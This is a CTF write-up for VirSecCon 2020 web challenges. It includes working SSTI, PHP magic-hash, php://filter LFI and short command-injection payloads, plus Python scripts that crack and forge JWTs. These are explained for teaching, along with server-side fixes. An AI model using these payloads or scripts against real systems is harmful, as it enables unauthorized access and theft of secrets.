VirSecCon CTF 2020 Writeup

Cyb3rlant3rn
Apr 5, 2020

FLASK

The very first thing that should catch our attention is that it is a Flask application, so one should check for SSTI (server-side template injection). The next job is to identify which template engine is behind it. Using the payload

{{7*'7'}}

the output 7777777 in the response box indicates the Jinja2 template engine (Twig would answer 49, and the simpler probe {{7*7}} gives 49 in both, which only proves that expressions are being evaluated). Flask exposes the application's configuration to every template as the config global, so the simple payload below, which just renders that object, will display the flag:

{{config}}

'SECRET_KEY': 'LLS{server_side_template_injection_unmasked}'
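To show why that single expression is enough, here is an added example (not code from the writeup or the challenge) that imitates what Flask's render_template_string() does: it compiles user-controlled text as template source and registers the app config as the template global `config`. It assumes only that the Jinja2 package is installed; the `APP_CONFIG` dict is a constructed stand-in for app.config, and the fingerprint() helper runs the two probes discussed above.

```python
"""Added example, not code from the writeup or the challenge: why {{config}}
leaks Flask's SECRET_KEY, what Jinja2's sandbox does and does not stop, and
what the fix looks like.

Assumes only the Jinja2 package (pip install jinja2). Flask is not needed:
render_template_string() compiles the string with the app's Jinja2
environment, and Flask registers the app config as the template global
`config`, which is what the environments below imitate.
"""
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment

# Constructed stand-in for app.config; the secret is the flag value from the writeup.
APP_CONFIG = {
    "DEBUG": False,
    "SECRET_KEY": "LLS{server_side_template_injection_unmasked}",
}


def _env(cls):
    env = cls()
    env.globals["config"] = APP_CONFIG  # what Flask does for every template
    return env


def render_vulnerable(user_input: str) -> str:
    """Mirrors render_template_string("Hello " + user_input): the input becomes
    template *source*, so any {{ ... }} inside it is evaluated by Jinja2."""
    return _env(Environment).from_string("Hello " + user_input).render()


def render_sandboxed(user_input: str) -> str:
    """Same bug under Jinja2's SandboxedEnvironment. The sandbox blocks things
    like __class__ walks, but `config` is a legitimately exposed global, so
    the secret still leaks; a sandbox is not a fix for this pattern."""
    return _env(SandboxedEnvironment).from_string("Hello " + user_input).render()


def render_safe(user_input: str) -> str:
    """Fix: the template text is static and the input is passed as a variable.
    Jinja2 treats variable values as data, never as template syntax."""
    return _env(Environment).from_string("Hello {{ name }}").render(name=user_input)


def fingerprint(render) -> str:
    """Classify an endpoint with the two probes used in the writeup.
    {{7*7}} -> 49 in most engines (proves evaluation only); {{7*'7'}} -> 7777777
    under Jinja2 because Python string repetition applies, whereas Twig casts
    '7' to a number and answers 49."""
    if "49" not in render("{{7*7}}"):
        return "no evaluation"
    if "7777777" in render("{{7*'7'}}"):
        return "jinja2"
    return "other (twig-like)"


if __name__ == "__main__":
    probe = '{{config["SECRET_KEY"]}}'
    for name, fn in (("vulnerable", render_vulnerable),
                     ("sandboxed", render_sandboxed),
                     ("safe", render_safe)):
        print(f"{name:10} {fingerprint(fn):18} {fn(probe)}")
```

The point of the third renderer is the caveat: dumping `config` needs no sandbox escape at all, so the only real fix is to stop concatenating user input into template source.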

MAGICIAN

From the challenge name it can be guessed that it is about PHP magic hashes. In PHP, two strings that both match the regular expression 0+e[0-9]+ compare equal with == because both are numeric strings evaluating to 0 times a power of ten, i.e. 0. For example, '0e1' == '00e2' is true.

To get the flag we just have to enter a string whose MD5 hash starts with 0e or 00e and contains only digits after the e. The reason we enter a string rather than a numeric value is that the challenge filters numeric input, which rules out purely numeric candidates. After some digging around I came up with "KnCM6ogsNA1W", whose hash is 00e73414578113850089230341919829.
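As an added example (not from the writeup), the following Python emulates the PHP comparison rule the challenge relies on and checks candidate strings against it using only the standard library. The numeric filter is modelled as "reject all-digit input", which is an assumption about the challenge; the bounded find_magic() search shows why such strings are usually looked up rather than generated on the spot.

```python
"""Added example, not code from the writeup: PHP "magic hash" comparison
emulated in Python, plus a check that a candidate string produces one.
Standard library only. The numeric-input filter the writeup mentions is
modelled as "reject strings made only of digits", an assumption about the
challenge.
"""
import hashlib
import re
import string
from typing import Iterable, List, Optional

# A PHP numeric string (sign, surrounding whitespace and hex omitted for brevity):
# digits, optional fraction, optional exponent. "0e123" and "00e7" both match
# and both evaluate to 0 * 10**n == 0.
NUMERIC = re.compile(r"^(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")
# The shape a hash must have to loosely equal another magic hash.
MAGIC = re.compile(r"^0+e[0-9]+$")


def php_loose_eq(a: str, b: str) -> bool:
    """PHP's string == string: if both sides are numeric strings they are
    compared as numbers, otherwise byte-for-byte. (Unchanged in PHP 8, which
    only altered number-vs-string comparisons.)"""
    if NUMERIC.match(a) and NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_md5(s: str) -> bool:
    """True when md5(s) is 0e/00e... followed only by digits; a single letter
    after the 'e' makes the hash non-numeric and the trick fails."""
    return MAGIC.match(md5_hex(s)) is not None


def usable_candidates(candidates: Iterable[str]) -> List[str]:
    """Magic strings that also pass the challenge's numeric filter (assumed to
    reject all-digit input, which rules out the classic 240610708)."""
    return [c for c in candidates if is_magic_md5(c) and not c.isdigit()]


def find_magic(prefix: str = "x", max_tries: int = 100_000) -> Optional[str]:
    """Bounded search for a fresh magic string of the form prefix + counter.
    The probability that a random MD5 matches MAGIC is about 2**-8 * (10/16)**30,
    roughly 3e-9, so a real run needs on the order of 10**8 candidates; keep
    the bound small when experimenting."""
    for i in range(max_tries):
        s = f"{prefix}{i}"
        if is_magic_md5(s):
            return s
    return None


# Two well-known magic strings, the one the writeup used, and a control.
KNOWN = ["QNKCDZO", "240610708", "KnCM6ogsNA1W", "not_magic"]

if __name__ == "__main__":
    for c in KNOWN:
        print(f"{c:14} {md5_hex(c)}  magic={is_magic_md5(c)}")
    print("usable despite numeric filter:", usable_candidates(KNOWN))
    print("fresh:", find_magic(max_tries=2000) or "none found within bound")
```

Note that the fix on the server side is `===` (or hash_equals()), which compares the strings byte for byte and never goes through the numeric path.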

GLHF

Opening the URL given in the challenge leads to a page with a bunch of directory links. Most of them just redirect to Google, but the FLAG link redirects to http://jh2i.com:50014/index.php?page=FLAG.

The page parameter in the source suggests a local file inclusion (LFI). Using Burp Intruder I ran all my LFI payloads (path traversal and the usual file targets), but none of them produced a positive result.

Then I remembered another way to exploit an LFI: PHP stream wrappers. include() accepts php://filter, and the convert.base64-encode filter hands PHP the included file base64-encoded, so it is printed rather than executed. Using the payload php://filter/convert.base64-encode/resource=FLAG as the page value I got a base64 string; decoding it gave the source code of an HTML page within which the flag was hidden.

LLS{lmfao_php_filters_ftw}
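To make the wrapper step repeatable, here is an added example (not code from the writeup) that builds the php://filter variants worth trying against a suspected include($_GET['page']) and recovers the source from the base64 the server sends back. It uses only the standard library; the HTTP response and the flag inside it are constructed for the example, and the base URL is the one from the challenge.

```python
"""Added example, not code from the writeup: generating php://filter payloads
for a suspected include($_GET['page']) and recovering the source from the
base64 the server returns. Standard library only; the HTTP response below is
constructed in-line, and the flag in it is made up for the example.
"""
import base64
import binascii
import re
from typing import List, Optional
from urllib.parse import quote

B64_RUN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
FLAG_RE = re.compile(r"LLS\{[^}]*\}")


def filter_payloads(resource: str) -> List[str]:
    """Wrapper variants worth trying. include() reads the stream and the filter
    transforms the bytes on the way in, so PHP sees base64 text with no <?php
    tag and prints it instead of executing it."""
    return [
        f"php://filter/convert.base64-encode/resource={resource}",
        f"php://filter/read=convert.base64-encode/resource={resource}",
        # if the application does not append .php itself
        f"php://filter/convert.base64-encode/resource={resource}.php",
        # rot13 also neutralises the <?php tag, useful if "base64" is blocklisted
        f"php://filter/string.rot13/resource={resource}",
    ]


def build_url(base: str, param: str, payload: str) -> str:
    return f"{base}?{param}={quote(payload, safe='/:=.')}"


def extract_source(body: str) -> Optional[str]:
    """Find the longest base64 run in the page (the include output is usually
    wrapped in the site's own HTML), fix padding, and decode it."""
    runs = B64_RUN.findall(body)
    if not runs:
        return None
    blob = max(runs, key=len)
    blob += "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def find_flags(text: str) -> List[str]:
    return FLAG_RE.findall(text)


# Constructed FLAG source and the response the vulnerable page would wrap it in.
SAMPLE_SOURCE = (
    "<html>\n<!-- LLS{constructed_example_flag} -->\n"
    "<?php echo 'nothing to see here'; ?>\n</html>\n"
)
SAMPLE_RESPONSE = (
    "<html><body><a href='?page=FLAG'>FLAG</a>\n"
    + base64.b64encode(SAMPLE_SOURCE.encode()).decode()
    + "\n</body></html>"
)

if __name__ == "__main__":
    for p in filter_payloads("FLAG"):
        print(build_url("http://jh2i.com:50014/index.php", "page", p))
    src = extract_source(SAMPLE_RESPONSE)
    print(src)
    print("flags:", find_flags(src or ""))
```

The rot13 variant is listed because it fails the same way base64 does when the application appends an extension or strips the word "base64"; if every variant returns an empty page, the parameter is probably being validated against an allowlist rather than passed straight to include().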

10 CHARACTER WEBSHELL

Looking at the source code, I first tried executing commands such as ls through the c parameter.

It returned a list of files including flag.txt. But when I tried to print the file with c=cat%20flag.txt I got an error saying the command was too long: the shell limits the length of the command, and cat flag.txt is 12 characters. So we need a command short enough to pass the limit that still prints the flag.

Since I had to keep the character count minimal and knew the flag would contain '{', the command grep -r { (9 characters) worked for me and printed the flag.

JaWT

As the name suggests, this is a JWT-based challenge. Since the alg:none attack and the other signature-tampering tricks did not work here, our remaining option was to guess the key that was used for the JWT signature.

We can use the excellent GitHub tool jwt-tool to brute-force the secret used for signing the token. For the wordlist, use our favourite rockyou.txt.

After obtaining the key our task is to forge the signature. Intercept the request and send it to Repeater in Burp, install the Burp extension "Json web token", and open the request in that extension.

Change user to admin, set the extension to recalculate the signature, enter the key "fuckit", hit Go, and we get our flag in the response.
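The two steps above (a dictionary attack on the HS256 secret, then re-signing a modified payload) are small enough to do without tooling, so here is an added example in plain Python that is not from the writeup and is not the jwt-tool or Burp extension code. The token is constructed here and signed with the secret the writeup recovered, and the wordlist is a short stand-in for rockyou.txt.

```python
"""Added example, not code from the writeup and not the jwt-tool / Burp
extension it used: the same two steps (dictionary attack on an HS256 secret,
then re-signing a modified payload) with only the standard library.
The token is constructed here, signed with the secret the writeup recovered;
the wordlist is a short stand-in for rockyou.txt.
"""
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    h = b64url(json.dumps(header, separators=(",", ":")).encode())
    p = b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url(sig)}"


def verify_hs256(token: str, secret: bytes) -> bool:
    h, p, s = token.split(".")
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(s))


def claims(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[1]))


def crack_hs256(token: str, wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Dictionary attack: recompute the MAC over header.payload for every
    candidate. Only meaningful when alg is HS256 (HS384/512 just change the
    hash; an RS256 token cannot be recovered this way)."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != "HS256":
        raise ValueError("not an HS256 token")
    signing_input, target = f"{h}.{p}".encode(), b64url_decode(s)
    for word in wordlist:
        if hmac.new(word, signing_input, hashlib.sha256).digest() == target:
            return word
    return None


def forge(token: str, secret: bytes, **changes) -> str:
    """Keep the header, apply the claim changes, re-sign (what the Burp
    extension's 'recalculate signature' option does)."""
    h, p, _ = token.split(".")
    payload = json.loads(b64url_decode(p))
    payload.update(changes)
    return sign_hs256(json.loads(b64url_decode(h)), payload, secret)


# Constructed inputs: the challenge token as the server would have issued it,
# and a few lines standing in for rockyou.txt (read the real file in binary
# mode, it contains lines that are not valid UTF-8).
ORIGINAL_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"user": "guest"}, b"fuckit")
WORDLIST = [b"123456", b"password", b"iloveyou", b"princess", b"fuckit", b"rockyou"]

if __name__ == "__main__":
    secret = crack_hs256(ORIGINAL_TOKEN, WORDLIST)
    print("secret:", secret)
    admin_token = forge(ORIGINAL_TOKEN, secret, user="admin")
    print("forged:", admin_token)
    print("claims:", claims(admin_token), "valid:", verify_hs256(admin_token, secret))
```

Against the full rockyou.txt this loop takes tens of seconds in pure Python; jwt-tool or hashcat's JWT mode (-m 16500) are the practical choice for larger wordlists, but the logic is exactly this: one HMAC per candidate, compared against the signature already in hand.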

Cyb3rlant3rn

Security Consultant | Bug Hunter | Twitter: @Cyb3rlant3rn